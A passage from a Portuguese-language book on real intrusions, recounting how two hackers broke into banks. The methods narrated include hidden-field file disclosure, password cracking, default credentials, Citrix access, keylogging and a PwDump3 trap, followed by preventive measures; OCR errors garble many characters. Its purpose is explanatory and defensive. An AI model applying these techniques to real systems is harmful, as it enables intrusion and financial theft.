quando se tomar evidente que a outra pessoa esta tentando 'aproveitar a deixa' e entrar com eles. A regra simples 
deveria ser esta: pergunte e, se a pessoa nao tiver cracha, informe ao seguranęa ou a recepcionista, mas nao permita 
que estranhos o acompanhem, entrando na area de seguranęa. 

Fabricar crachas de identificaęao falsos e urna tecnica facil demais para se entrar num edificio supostamente 
seguro sem ser parado. Mesmo os guardas de seguranęa com frequencia nao observam um cracha o suficiente para 
dizerem se e verdadeiro ou falso. Isso seria mais dificil se a empresa estabelecesse (e obrigasse) urna politica que 
solicitasse aos funcionarios, colaboradores e temporarios que guardassem seus crachas ao sairem do edificio, o que 
evitaria que os possiveis atacantes observassem seu design. 

Todos nos sabemos que os seguranęas nao vao examinar com cuidado o cracha de identificaęao de cada 
funcionario (o que, afinal, seria quase impossivel, mesmo para um guarda consciente, quando urna leva de pessoas 
passa por ele pela manha e no finał do dia). Entao, outros metodos para se proteger contra a entrada indesejavel de 
um atacante precisam ser adotados. Instalar leitoras eletrónicas de crachas oferece muito mais proteęao. Mas, alem 
disso, os seguranęas devem ser treinados a questionar detalhadamente qualquer um cujo cracha nao seja reconhecido 
pela leitora, urna vez que, como foi sugerido na historia, o problema pode nao ser urna pequena falha do sistema, mas 
um atacante tentando entrar no predio. 

Embora a conscientizaęao do treinamento de seguranęa esteja se tomando muito mais comum em todas as 
empresas, quase sempre ele e insuficiente. Mesmo empresas com um programa efetivo frequentemente ignoram a 
necessidade de treinamento especializado para os gerentes, a firn de que eles sejam conscientizados para assegurar 
que seus subordinados sigam os procede-mentos prescritos. As empresas que ainda nao treinam todos os funcionarios 
na area de seguranęa tern urna seguranęa fraca. 

O resultado 

E rara a oportunidade de os leitores conhecerem melhor o pensamento e as taticas de alguem que contribuiu 
significativamente para o arsenał de ferramentas do hacker. Mudge e lOphtCrack fazem parte dos livros de historia. 

Na opiniao de Dustin Dykes, da Callisma, as empresas que pedem um pen test frequentemente tomam decisoes 
que vao contra seus melhores interesses. Voce nunca sabera o quanto sua empresa e verdadeiramente vulneravel ate 
que autorize um teste completo, sem proibięoes, irrestrito, que permita engenharia social e entrada fisica, bem como 
ataques baseados em conhecimentos tecnicos. 
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E daro que seu banco 
e seguro — certo? 


Se voce tenta tornar seus sistemas inviolaveis, ha sempre alguem mais tolo ainda 
que e mais mventivo que voce. 

Juhan 


Mesmo que as outras organizaęoes nao possam ser comparadas em suas praticas de seguranęa para barrar a porta 
aos hackers, pelo menos gostariamos de pensar que nosso dinheiro esta seguro, que ninguem e capaz de obter nossas 
informaęoes financeiras ou, ainda, o maior dos pesadelos, de entrar em nossas contas bancarias e emitir comandos 
que transfiram nosso dinheiro para os bolsos deles. 

A ma noticia e que a seguranęa em muitos bancos e instituięoes financeiras nao e tao boa quanto as pessoas 
responsaveis por eles imaginam que seja. As histórias a seguir ilustram isso. 

Na distante Estonia 

Esta historia mostra que as vezes ate um sujeito que nao e hacker pode ser bem-sucedido num hack de banco. 
Essa nao e urna boa noticia para os bancos, nem para qualquer um de nos. 

Eu nunca visitei a Estonia e talvez nunca va para la. O nome evoca imagens de castelos antigos cercados por 
florestas sombrias e camponeses supersticiosos — o tipo de lugar por onde um estranho nao quer andar sem um 
amplo arsenał de estacas de madeira e balas de prata. Esse estereótipo (reforęado pelas fitas de horror grosseiras de 
baixo oręamento filmadas nos bosques, vilarejos e castelos do Leste Europeu) revela-se mais do que simplesmente 
impreciso. 

Os fatos sao bem diferentes. A Estonia e muito mais moderna do que eu descrevi, como aprendi com um hacker 
chamado Juhan, que mora la. Juhan, de 23 anos, mora sozinho em um espaęoso 
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apartamento de ąuatro dormitórios, no coraęao da cidade, com "um pe-direito realmente alto e muita cor". 

A Estonia, aprendi, e um peąueno pais com cerca de 1,3 milhao de pessoas (ou aproximada-mente a 
populaęao da cidade da Filadelfia), situado entre a Russia e o golfo da Finlandia. A Capital, Tallinn, ainda e 
marcada por edificios de apartamentos de concreto e monumentos cinzentos, que foram urna tentativa do 
antigo imperio sovietico de abrigar seus colaboradores de maneira economicamente viavel, 

Juhan reclamou: "As vezes, ąuando as pessoas ąuerem saber sobre a Estonia, elas fazem perguntas como: 
'Voces tern medicos? Voces tern universidade?' Mas o fato e que a Estonia esta se unindo a Uniao Europeia 
em primeiro de maio [2004]". Muitos estonianos, diz ele, estao trabalhando para um dia poderem sair de seu 
apartamento da era sovietica, apertado, e se mudar para urna pequena casa própria, num suburbio tranqiiilo. 
E sonham em poder "dirigir um importado confiavel". De fato, muitas pessoas ja tern carros e um numero 
cada vez maior esta adquirindo casa própria, "entao, esta melhorando a cada ano". E tecnologicamente, 
tambem, o pais nao esta defasado, como Juhan explicou: 

A Estonia, ja no inicio da decada de 1990, comeęou a implementar a infra-estrutura de servięos 
bancarios eletrónicos, caixas eletrónicos e servięo de banco pela Internet. E muito moderna. Na 
yerdade, as empresas estonianas fornecem tecnologia de 
computador e servięos a outros paises da Europa. 

Voce poderia pensar que isso descreveria o paraiso de um hacker: grandę uso da Internet e 
provavelmente atraso quando o assunto e seguranęa. Nao e bem assim, de acordo com Juhan: 

No que diz respeito a seguranęa na Internet, em geral esse e um bom lugar, porąue o pais 
e as comunidades sao multo peąuenos. E, na realidade, bem conveniente para os 
provedores de servięos implementarem tecnologias. E, se levarmos em conta o setor 
financeiro, acho que o fato de a Estonia nunca ter tido uma infra-estrutura de cheques de 
banco — os cheques usados para pagar muitas faturas nas lojas — provoca nos norte- 
americanos essa ideia de atraso. 

Poucos estonianos vao a um banco, diz ele. "A maioria das pessoas tem conta corrente, mas nao 
sabe como e um talao de cheques." Nao porque nao entendam de assuntos financeiros, mas porque, 
nessa area, pelo menos, eles estao a frente, como Juhan explica: 

Nunca tivemos uma grandę infra-estrutura bancaria. Ja no inicio da decada de 1990, 
comeęamos a implementar a infra-estrutura de servięo bancario eletronico e o servięo 
pela Internet. Mais de 90 a 95 por cento das pessoas e empresas que efetuam 
transferencias em dinheiro estao usando o seryięo de banco pela Internet. 


E elas usam carroes de credito ou 'cartoes de banco', na terminologia europeia. 
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E mais conveniente fazer pagamento direto na forma de servięo bancario pela Internet ou com 
cartoes de banco, e simplesmente nao ha razao para as pessoas usarem cheąues. Ao contrario 
dos Estados Unidos, quase todos aqui utilizam a Internet para os servięos bancarios e para 
pagar suas contas. 

O banco de Perogie 

Juhan usa computadores desde a tenra idade de 10 dez anos, mas nao se considera um hacker, apenas um 
white-hat preocupado com seguranęa. Entrevista-lo nao foi problema — ele comeęou a aprender ingles no 
initio da segunda serie, na escola. O jovem estoniano tambem estudou muito e viajou ao exterior, o que lhe 
propiciou outras oportunidades de desenvolver suas habilidades de conversaęao em ingles. 

Recentemente, houve um invemo muito rigoroso na Estonia, com condięoes polares, bancos de neve por 
toda parte e temperaturas marcando menos de 25 graus centigrados. Foi tao triste que nem mesmo as pessoas 
do local, que estavam acostumadas a invemos gelados, queriam sair de casa, a menos que precisassem. Foi 
urna boa epoca para um cara que gosta de computador ficar colado na tela, caęando qualquer coisa boa o 
suficiente para prender sua atenęao. 

Foi o que Juhan estava fazendo quando topou com um site Web que chamaremos de Bank of Perogie. 
Parecia um alvo que valia a pena explorar. 

Entrei na seęao FAQ interativa, que permite que as pessoas faęam perguntas. Tenho o habito de 
olhar paginas de pesquisa na Web. Fui dar num site Web e comecei a explora-lo. Sabę como e o 
processo — voce navega e da uma olhada sem nenhum propósito estrategico. 

Ele notou que o sistema de arquivos era do tipo usado pelo Unix. Aquilo definiu imediatamente o tipo de 
ataque que tentaria. Ver o código-fonte de varias paginas Web revelou uma variavel escondida que apontava 
para um nome de arquivo. Quando ele tentou mudar o valor armazenado no elemento form escondido, "ficou 
claro que eles nao faziam nenhum tipo de solicitaęao de autenticaęao. Entao, se eu submeti uma entrada do 
site do banco ou de um PC local, nao importava para o servidor do banco", disse ele. 

Juhan mudou os atributos do elemento form escondido para apontar para o arquivo da senha, que lhe 
permitia exibir esse arquivo em sua tela. Ele descobriu que as senhas nao eram 'mascaradas', o que significa 
que a forma criptografada padrao de toda senha da conta era visivel para ele. Logo, conseguiu fazer o 
download das senhas criptografadas e executa-las por meio de um cracker de senha. 

O programa cracker de senha escolhido por Juhan era conhecido pelo nome divertido de 'John the 
Ripper', que ele executou usando um dicionario ingles padrao. Por que ingles, em vez de estoniano? "E 
pratica comum por aqui usar senhas em ingles." Mas o fato e que muitos estonianos tern um bom 
conhecimento basico de ingles. 

O programa cracker nao demorou muito, apenas cerca de 15 minutos em seu PC, visto que as senhas eram 
basicas — simples palayras em ingles com alguns numeros acrescentados no finał. 
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Uma delas era preciosa: de descobriu a senha root, que lhe dava priyilegios de administrador. E mais ainda: 

Ha esse servięo de telebanking, que tem um nome comercial que nao sei se deveria mencionar 
aqui, mas [descobri] uma conta para aquele servięo. Parecia que provavelmente era a conta do 
sistema que estava executando os servięos naquele servidor. 

Ele nao foi alem, explicando que "parei quando obtive as senhas". Prudencia era o nome do jogo. 

Eu podia me meter em encrenca. Afinal, trabalho com negócio de seguranęa de informaęao. Eu 
tinha motiyos para nao causar nenhum mai. 

Mas a situaęao parecia boa demais para ser yerdade. Imaginei que poderia ser um pote de mel, 
uma armadilha para atrair pessoas como eu e processa-las. Entao, entrei em contato com meus 
superiores e eles relataram isso ao banco. 

O que ele revelou nao o deixou em ma situaęao com seu empregador nem com o banco — ocorreu 
exatamente o contrario. Ofereceram a empresa dele a incumbencia de inyestigar mais e chegar a uma soluęao 
para eliminar a brecha. A empresa de Juhan o incumbiu da tarefa, imaginando que ele poderia terminar o que 
ja tinha comeęado. 

Foi uma surpresa para mim que as coisas tenham acontecido assim, porque na realidade a 
seguranęa na Internet, na Estonia, esta num nivel melhor do que em outros lugares. isso nao e 
julgamento meu, mas de varias pessoas que vem para ca, de outros lugares. Entao, foi meio 
surpreendente descobrir esse furo, e foi muito facil me infiltrar em informaęoes bastante 
secretas. 

Opiniao pessoal 

Depois dessa experiencia, Juhan passou a acreditar que para uma empresa que foi comprometida por um 
hacker e melhor nao processa-lo, mas, em vez disso, trabalhar com ele para corrigir os problemas que 
descobriu — algo do tipo "se voce nao pode vence-los, junte-se a eles". E claro que o govemo normalmente 
nao ve as coisas assim, como ficou comprovado com Adrian Lamo (ver Capitulo 5), que foi condenado por 
delito grave, apesar de ele (na maior parte das vezes) ter prestado um seryięo publico, avisando as empresas 
sobre suas yulnerabilidades. Processar, certamente, pode ser uma situaęao em que todos perdem, sobretudo se 
a empresa nunca e informada sobre as yulnerabilidades particulares que o hacker usou para se infiltrar em sua 
rede. 

Como uma resposta impulsiva, os firewalls e outras defesas sao acrescentados, mas essa e uma 
abordagem que pode ignorar completamente as brechas ocultas que os hackers astutos podem descobrir, para 
nao mencionar todas aquelas ja conhecidas pela comunidade de hackers. Juhan resumiu sua opiniao sobre 
isso em uma declaraęao particularmente interessante: 

tli 
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Se voce tenta tornar seus sistemas inviolaveis, ha sempre alguem mais tolo ainda que e mais inventivo 

que voce. 

O hack de banco a longa distancia 

Gabriel fala francos fluentemente e vive numa cidade canadense tao peąuena que. embora ele se descreva como 
um hacker 'do bem' e considere o deface* um ato de estupidez, reconhece que "fez isso uma ou duas vezes quando 
estava entediado a ponto de entrar em desespero", ou quando descobria um site "onde a seguranęa era tao fraca que 
alguem precisava aprender uma lięao". 

Mas como um cara que vive numa area rural do Canada faz um hack de banco num estado do Sul dos Estados 
Unidos, bem no coraęao de Dixie? Ele descobriu um site Web que mostrava "quais intervalos de endereęo IP 
(netblocks) eram atribuidos a determinadas organizaęoes".' E buscou a lista "para palavras como govemo, banco ou o 
que fosse" e apareceu um intervalo IP (por exemplo, 69.75-68.1 a 69.75.68.254) que ele, entao, escaneou. 

Um dos itens encontrados foi um endereęo IP que pertencia a determinado banco situado no coraęao de Dixie. 
Aquilo lanęou Gabriel no que se tomaria um hack intensivo. 

Nao se nasce hacker 

Aos 15 anos (uma idade que, como voce pode ter notado nos capitulos anteriores, e considerada um inicio tardio, 
algo como aprender basquete na escola e ir para a NBA), Gabriel tinha dekado de jogar games, como Doom, e 
comeęado com o hacking junto com um amigo em sua maquina 386, com disco rigido de 128 MB. Quando 
comprovou que a maquina era lenta demais para o que queria fazer, Gabriel gastou o que para ele era uma fortuna 
jogando network games no cibercafe local. 

O mundo dos computadores viciava e era um doce alivio para a dura competitividade na escola, onde Gabriel 
suportava diariamente a gozaęao dos colegas só porque era diferente. Nao ajudaram o fato de ele ser o novo garoto do 
'pedaęo' e o mais jovem da classe, nem o fato de ja ter frequentado escola em outra provincia antes de a familia 
mudar-se. Ninguem disse que era facil ser um 'geek', ou seja, um fanatico por computador. 

Os pais dele, que trabalhavam para o govemo, nao entendiam a obsessao do filho pelas mas-quinas, mas esse 
parece ser um problema comum de geraęoes criadas em uma epoca em que a tecnologia esta presente o tempo todo. 
"Eles nunca quiseram que eu comprasse um computador", ele lembra. O que eles queriam era que o filho "saisse e 
fizesse alguma coisa". Ficaram tao preocupados com o filho que o encaminharam a um psicólogo para ajudar a 'toma- 
lo normaf. O que aconteceu naquelas sessoes, sem duvida, nao fez o adolescente desajeitado desistir de sua paixao 
por computadores. 

Gabriel fez cursos da Cisco em uma faculdade local de comercio. Totalmente autodidata, ele sabia, com 
frequencia, mais que os professores, que as vezes o deixavam dar as explicaęoes dificeis. Agora, com 21 anos, o 
canadense parece ter o tipo de talento para hacker que lhe permite fazer descobertas sozinho. Mesmo quando e uma 
faęanha conhecida, a capacidade distingue o hacker, 

* Ato de desconfigurar paginas da Web (N. da R. T.). 
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que vive em um mundo diferente daąuele dos 'script kiddies'*, que nao descobrem nada por conta própria, apenas 
fazem o download de goodies da Web. 

Um programa de que gostava era chamado Spy Lantem Keylogger. Esse e outro daqueles programas com 
capacidade de mascarar eletronicamente as pessoas que estao trabalhando, permitindo que o hacker intercepte 
secretamente toda tecla digitada no sistema do computador-alvo — só que se supoe que este esteja todo invisivel na 
maquina-alvo. 

Alem disso, ele tambem usava o recurso de controle remoto 'shadowing' de um aplicativo chamado Citrix 
MetaFrame (permite acessar com facilidade e seguranęa a empresa on-demand), projetado para permitir que os 
administradores de sistemas monitorem e deem assistencia aos funcionarios da empresa. Com o recurso shadowing, o 
administrador de sistema pode espionar um usuario sem ser descoberto, vendo em sua tela de computador o que o 
usuario esta fazendo e digitando, e pode ate assumir o controle do computador. Um bom hacker que consiga localizar 
urna empresa que esteja executando o Citrix pode fazer o mesmo: assumir o controle de computadores, isso, 
obviamente, requer enorme cautela* Se ele nao for cuidadoso, suas aęoes serao identificadas, urna vez que qualquer 
um que esteja a frente do computador vera o resultado das aęoes tomadas (o cursor se movendo, aplicativos abrindo e 
assim por diante). Mas isso tambem pode oferecer a um hacker urna chance para diversao inocente. 

Vejo pessoas escrevendo e-mails a suas esposas ou coisas do genero. Voce pode realmente mover o mouse 

delas na tela. E muito engraęado. 

Uma vez, entrei no computador de um cara e comecei a mover o cursor dele. Ele abriu um arquivo no 

bloco de notas. Eu digitei "Ei". 

Naturalmente, um hacker que queira assumir o computador de alguem costuma escolher um horario em que 
provavelmente ninguem esteja por perto. "Eu costumo fazer isso depois da meia-noite", explicou Gabriel, "para ter 
certeza de que nao ha ninguem la. Ou só verifico a tela do computador deles. Se o Screensaver esta funcionando, isso 
geralmente significa que ninguem esta no computador." 

Mas, certa vez, ele se enganou e o usuario estava na maquina. As palavras: "Eu sei que voce esta me olhando!" 
apareceram na tela de Gabriel. "Eu desconectei imediatamente." Outra vez, alguns arquivos que ele havia escondido 
foram encontrados. "Eles os apagaram e me enviaram uma mensagem: IREMOS PROCESSA-LO USANDO TUDO 
O QUE A LEI PERMITIR'." 

A invasao no banco 

Quando Gabriel navegava pela Internet e encontrou detalhes sobre endereęos de IP do banco Dixie, ele seguiu a 
pista e descobriu que nao se tratava de um banco de uma cidade pequena, mas que possuia extensos vinculos 
nacionais e intemacionais. Ainda mais interessante, tambem descobriu que os servidores do banco estavam 
executando o Citrix MetaFrame, que e o software de servidor que permite a um usuario acessar remotamente sua 
estaęao de trabalho. Uma lampada 

* Pessoas que tern como objetivo obter acesso ao sistema da maneira mais facil possivel, 
independentemente de quem seja o alvo ou a informaęao (N. da R. T.). 
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acendeu em sua mente por causa de uma coisa que Gabriel e um amigo tinham percebido de suas experiencias 
anteriores de hacking. 

Esse amigo e eu tinhamos descoberto que a maioria dos sistemas que executam seryięos Citrix 

nao tem boas senhas. Eles as entregam ja ativadas. mas deixam o usuario finał sem senha. 

Gabriel trabalhou com um port scanner, uma ferramenta hacker (ou ferramenta de auditoria, dependendo 
da intenęao do usuario) que escaneia outros computadores ligados em rede para identificar portas abertas. Ele 
estava procurando qualquer sistema com a porta 1494 aberta, porque essa e a porta usada para acessar 
remotamente os seryięos nos terminais Citrix. Entao, qualquer sistema com a porta 1494 aberta era um 
sistema potencial que ele poderia 'ter' com sucesso. 

Cada vez que ele encontrava uma, procurava cada arquivo do computador para a palavra senha. E como 
garimpar para encontrar ouro. Boa parte das vezes, voce chega com as maos vazias, mas as vezes descobre 
uma pepita. Nesse caso, a pepita poderia ser um lembrete de que alguem tinha destruido um arquivo, talvez 
lendo algo como "senha do administrador para mail2 e liappyday"'. 

Com o tempo, Gabriel descobriu a senha do firewall do banco. Tentou se conectar a um roteador, 
sabendo que alguns roteadores comuns vem com uma senha-padrao de 'admin' ou 'administrator' e que 
muitas pessoas — nao apenas aquelas que tem computadores em casa, sem pista nenhuma, mas, muito 
frequentemente, ate mesmo profissionais de suporte de TI — utilizam uma nova unidade sem pensar em 
mudar a senha-padrao. E, de fato, foi o que Gabriel encontrou — um roteador com senha-padrao. 

Conseguido o acesso, Gabriel acrescentou uma regra ao firewall, permitindo que as conexoes entrassem 
na porta 1723 — a porta usada para os seryięos Virtual Private Network (VPN) da Microsoft, projetada para 
permitir a conectividade segura a rede corporativa para usuarios autorizados. Depois de sua autenticaęao ao 
servięo VPN, o computador dele recebeu um endereęo de IP na rede interna do banco. Felizmente para ele, a 
rede era 'fiat', o que significa que todos os sistemas eram acessiveis num unico segmento de rede, de modo 
que fazer hack em uma maquina tinha lhe dado acesso a outros sistemas de computador na mesma rede. 

O hack no banco, diz Gabriel, foi tao facil que pareceu "ate imbecil". O banco tinha contratado uma 
equipe de consultores de seguranęa que fomeceu um relatório ao concluir a tarefa. Gabriel desco-briu o 
relatório confidencial armazenado no servidor, que incluia uma lista de todas as vulnerabilidades que a 
equipe tinha encontrado — fomecendo um esquema pratico de como explorar o resto da rede. 

Como servidor, o banco estava usando um IBM AS/400, uma maquina com a qual Gabriel tinha pouca 
experiencia. Mas ele descobriu que o servidor de dominio Windows armazenava um manuał completo de 
operaęoes para os aplicativos usados naquele sistema, do qual ele fez download, Quando digitou em seguida 
'administrator' — a senha IBM padrao —, o sistema deixou-o entrar. 

Eu diria que 99 por cento das pessoas que trabalham la usavam 'password 123' como senha. 

Eles tambem nao tinham um programa antmrus funcionando em segundo piano. Eles o 

passayam talyez uma vez por semana. 



A arte de invadir 


Gabriel sentiu-se livre para instalar o Spy Lantem Keylogger, seu favorito na categoria, sobretudo devido a 
capacidade singular que o programa tinha de registrar informaęoes simultaneamente de qualquer numero de pessoas 
que estivessem fazendo o login no servidor Citrix. Gabriel esperou ate que um administrador entrasse e 'capturou' 
sua senha. 

De posse das senhas certas, Gabriel acertou em cheio: um conjunto completo de manuais de treinamento on-line 
sobre como usar os aplicativos criticos no AS/400. Ele podia efetuar qualquer atividade exercida por um caixa — 
fazer transferencia eletronica de fundos, ver e mudar informaęoes de contas de clientes, observar a atividade de caixa 
eletrónico em todo o pais, verificar emprestimos e transferencias do banco, acessar a Equifax para verificaęoes de 
credito e ate revisar no tribunal arquivos referentes a cheques sem fundo. Ele tambem descobriu que do site do banco 
podia acessar o banco de dados do computador do Departamento de Veiculos Motorizados do Estado. 

A seguir, ele queria obter os hashes de senha do PDC (Primary Domain Controller — Controlador Primario de 
Dominio), que autentica qualquer solicitaęao de login ao dominio. O programa escolhido por ele para fazer isso foi o 
PwDump3, que extrai todos os hashes de senha da parte protegida do registro do sistema. Ele conseguiu acesso de 
administrador local na maquina e entao acrescentou um script para executar o PwDump3 como um atalho na pasta de 
inicializaęao, distinguindo-o como algo inofensivo. 

Gabriel aguardou ate que um administrador de dominio se conectasse a maquina-alvo. O programa funciona de 
modo muito parecido com urna armadilha, entrando em aęao quando ativado por determinado evento — nesse caso, 
um administrador de sistema se conectando. Quando o administrador estabelece a conexao, os hashes de senha sao 
extraidos silenciosamente para um arquivo, O utilitario PwDump3 e executado da pasta de inicializaęao do 
administrador. "As vezes, leva dias [para um administrador de dominio se conectar]", diz ele, "mas vale a pena 
esperar." 

Quando o administrador de dominio entrou sem desconfiar de nada, ele extraiu sem saber os hashes de senha 
para um arquivo oculto. Gabriel voltou a cena do crime para obter os hashes de senha e executou um programa para 
violar senhas, usando o computador mais potente que pode acessar. 

Num sistema desses, urna simples senha, como 'senha', pode levar menos de um segundo para ser violada. As 
senhas do Windows parecem ser particularmente faceis, enquanto urna senha complicada que usa simbolos especiais 
pode levar muito mais tempo. "Teve urna que levei o mes todo para decodificar", Gabriel lembrou-se, arrependido. A 
senha do administrador do banco consistia de apenas quatro letras minusculas. Ela foi invadida mais rapido do que o 
tempo que voce levaria para ler este paragrafo. 

Alguem esta interessado em uma conta bancaria na Suięa? 

Alguns itens que Gabriel encontrou fizeram o restante parecer insignificante* Ele tambem descobriu como penetrar 
na parte mais sigilosa de qualquer operaęao bancaria — o processo de gerar transferencias eletrónicas. Gabriel 
descobriu as telas de menu para inicializar o processo. E tambem descobriu o modo on-line real usado pelo grupo 
seleto de funcionarios autorizados a efetuar transaęoes de retirada de fundos da conta de um cliente e o envio 
eletrónico de fundos para outra instituięao financeira que poderia estar no outro lado do mundo (na Suięa, por 
exemplo). 
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Mas um formulario em branco de nada adianta se voce nao souber como preenche-lo adeąuadamente. 
Acontece que isso tambem nao era problema. No manuał de instruęao que ele localizara anteriormente, havia 
um capitulo muito interessante. Gabriel nao precisou ler o capitulo todo para encontrar o que precisava. 

20.1.2 Entre/Atualize Transferencias Eletrónicas 
Menu: Wire transfers (WIRES) Opęao: Enter/Update 
Wire Transfers 

Essa opęao e usada para entrar em comandos eletrónicos nao-repetitivos e para selecionar comandos eletrónicos 
repetitivos a serem digitados e enviados. Os comandos eletrónicos nao-repetitivos sao para clientes que enviam urna 
transferencia ocasionalmente ou para nao-clientes que querem iniciar um comando eletrónico. Com essa opęao, 
comandos eletrónicos que entram tambem podem ser mantidos depois de ser efetuado seu upload. Ouando essa opęao for 
selecionada, a tela a seguir sera exibida. 

Wire Transfers 

Wire Transfers 11:35:08 

Outgoing 

Type options. press Enter. 

2=Change 4=Delete 5=Display Position to... 

Opt From account To beneficiary Amount 
F3=Exit F6=Add F9=Incoming F12=Previous 

Ouando essa opęao e escolhida inicialmente, nao havera opęóes listadas. Para acrescentar, pressione F6=Adde a tela 
sera exibida. 

Um capitulo inteiro mostrava passo a passo os procedimentos exatos para enviar um comando eletrónico 
daquele banco particular, transferindo fimdos para a conta de urna pessoa em outra instituięao fmanceira. 
Gabriel agora sabia tudo o que precisava para efetuar urna transferencia eletrónica. Ele tinha as chaves do 
reino. 

Consequencias 

Apesar de um amplo acesso ao sistema do banco e de um enorme poder nao autorizado a sua disposięao, 
Gabriel preferiu se manter limpo, para seu credito. Ele nao tinha interesse em roubar recursos nem em 
sabotar nenhuma informaęao do banco, embora pensasse em melhorar as classificaęóes de credito para 
alguns amigos. Como estudante matriculado num programa de seguranęa de urna faculdade local, Gabriel 
naturalmente avaliou as vulnerabilidades das medidas de proteęao do banco. 

Descobri muitos documentos no servidor sobre seguranęa fisica deles, mas nenhum relacionado 
a hackers. Encontrei alguma coisa sobre os consultores de seguranęa que eles contratam todo 
ano para verificar os servidores, mas isso nao basta para um banco. Eles estao fazendo um bom 
trabalho em seguranęa fisica, mas nao o suficiente para a seguranęa dos computadores. 
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Insight 

O site do banco na Estonia era um alvo facil. Juhan notou a falha quando viu o código-fonte das paginas 
Web do banco. O código usava um elemento form oculto que continha o nome do arquivo de um form template, 
que era carregado pelo script CGI e exibido aos usuarios em seu navegador Web. Ele mudou a variavel 
escondida para apontar para o arquivo senha do servidor e, voila. o arquivo de senha foi exibido em seu 
navegador. Surpreendentemente, o arquivo nao estava mascarado (shadowed), entao ele teve acesso a todas as 
senhas criptografadas, as quais violou mais tarde. 

O hack do banco Dixie oferece outro exemplo da necessidade de defesa profunda*. Nesse caso, a rede do 
banco parecia ser Hat, ou seja, sem proteęao significativa alem do unico servidor Citrix. Urna vez que qualquer 
sistema na rede estivesse comprometido, o atacante poderia conectar-se aos demais sistemas na rede. Um 
modelo de defesa profunda poderia ter evitado que Gabriel conseguis-se acesso ao AS/400. 

O pessoal de seguranęa de informaęao do banco foi tranquilizado com a falsa noęao de seguranęa em virtude 
de urna auditoria externa, o que pode ter aumentado razoavelmente o nivel de confianęa na situaęao geral de 
seguranęa. Embora urna avaliaęao de seguranęa ou auditoria seja um passo importante para medir a resistencia 
contra um ataque, um processo ainda mais crucial e gerenciar adequadamente a rede e todos os sistemas que 
estao nela. 

Medidas preventivas 

O site de banco on-line deveria ter exigido que todos os desenvolvedores de aplicativos Web adotassem 
praticas fundamentais de programaęao segura ou que exigissem auditoria de qualquer código colocado em 
produęao. A melhor pratica e limitar a quantidade de usuarios que e passada para um serverside script. Usar 
nomes de arquivos e constantes fortemente codificados, embora nao eloquentes, eleva o nivel de garantia na 
seguranęa do aplicativo. 

A monitoria displicente da rede e a fraca seguranęa de senhas no servidor Citrix foram os maiores erros nesse 
caso, e urna seguranęa mais cuidadosa provavelmente teria evitado que Gabriel ficasse vagueando pela rede, 
instalando keystroke loggers, mascarando outros usuarios autorizados e colocando programas Cavalo de Tróia. O 
hacker escreveu um pequeno script e o inseriu na pasta de inicializaęao do administrador, de modo que, quando 
ele se conectasse, o programa pwDump3 seria executado silenciosamente. E claro que ele ja tinha direitos de 
administrador. O hacker estava esperando ate que um administrador de dominio se conectasse para que ele 
pudesse sequestrar seus privilegios e extrair automaticamente os hashes de senha do controlador primario de 
dominio. O script oculto e chamado freqiientemente de Cavalo de Tróia ou de trapdoor. 

Urna lista parciał de medidas preventivas incluiria: * Verifique todas as contas desde a ultima vez em que 
tiver sido estabelecida urna senha em contas de servięo do sistema, como 'TsINternetUser', nao atribuidas a 
direitos nao 

* Com esse recurso, mesmo que os hackers descubram urna vulnerabilidade antes desconhecida e um servidor da 
rede ou do correio eletrónico esteja comprometido, os sistemas corporativos na rede interna ainda estarao 
protegidos por outro nivel de seguranęa (N. da R. T.). 
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autorizados ao administrador, direitos de grupos nao autorizados e a data do ultimo login. Essas 
verificaęoes periódicas podem permitir a identificaęao de um incidente de seguranęa, Procure senhas que 
foram dadas em horarios estranhos, uma vez que o hacker poderia nao perceber que a pessoa estava 
deixando uma pista de auditoria ao mudar senhas de conta. 

• Restrinja logins interativos ao horario de expediente. 

• Ative a auditoria de login e logout em todos os sistemas que sao acessiveis extemamente pela Internet, 
Extranet, dial-up ou sem fio. 

• Empregue software como SpyCop (disponivel em www.spycop.com) para detectar keystroke loggers nao 
autorizados. 

• Fique atento ao instalar updates de seguranęa. Em alguns ambientes, pode ser adequado fazer o download 
dos updates mais recentes automaticamente. A Microsoft esta incentivando os clientes a configurar seus 
sistemas de computador para fazerem isso. 

• Verifique sistemas acessiveis extemamente para software de controle remoto, como Win-VNC, TightVNC, 
Damware e assim por diante. Esses programas de software, embora tenham usuarios legitimos, podem 
permitir que um atacante monitore e controle sessoes conectadas ao sistema console. 

• Faęa auditorias cuidadosas de qualquer login que esteja usando o Windows Terminal Ser-vices ou o Citrix 
MetaFrame. A maioria dos atacantes escolheu usar esses seryięos, de preferencia em programas controlados 
a distancia, para reduzir a chance de serem detectados. 

O resultado 

Os hacks deste capitulo eram simples, tinham o objetivo de tirar yantagem da fraca seguranęa da senha das 
empresas e de Scripts CGI vulneraveis. Embora muitas pessoas — ate mesmo aquelas que entendem de seguranęa de 
computadores — pensem que as invasoes de hackers sao algo como um ataque estrategico do tipo Onze homens e um 
segredo, a triste verdade e que esses ataques, em sua maioria, nao sao engenhosos nem inteligentes. Eles sao bem- 
sucedidos porque grandę parte das redes nao tern proteęao adequada. 

Alem disso, as pessoas responsaveis por desenvolver e colocar esses sistemas em produęao estao cometendo erros 
simples de configuraęao ou falhas de programaęao que criam ótimas oportunidades para os milhares de hackers que 
batem a porta da frente todos os dias. 

Se as histórias das duas instituięoes financeiras contadas neste capitulo dao alguma indicaęao de como a maioria 
dos bancos do mundo atualmente esta protegendo informaęoes e recursos do cliente, entao poderemos optar por 
esconder novamente nosso dinheiro embaixo do colchao. 

Nota 


1. Embora ele nao tenha especificado o site, essa informaęao esta disponivel em www.flumps.orq/ip/. 
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Sua propriedade intelectual 
nao esta segura 


Se uma coisa nao funcionava, eu tentava outra, porąue sabia que algo 
funcionaria. Ha sempre alguma coisa que funciona. E só questao de 
descobrir o que e. 

Erik 


Qual e o ativo mais valioso do mundo em qualquer organizaęao? Nao e o hardware de computa-dor, nao 
sao os escritórios nem a fabrica, nem mesmo o que e proclamado no tao conhecido cliche da corporaęao: 
"Nosso ativo mais valioso e nosso pessoal". 

O fato óbvio e que qualquer um deles pode ser substituido. Tudo bem, nao tao facilmente, nao sem łuta, 
mas muitas empresas sobreviveram depois que sua fabrica foi queimada ou que alguns funcionarios-chave 
sairam. Sobreviver a perda da propriedade intelectual, entretanto, e uma historia total-mente diferente. Se 
alguem rouba seus designs de produto, sua lista de clientes, seus planos de novos produtos, seus dados de 
P&D — esse seria um golpe que poderia fazer sua empresa desaparecer, 

Alem disso, se alguem roubar mil produtos de seu depósito, uma tonelada de titanio de sua industria ou 
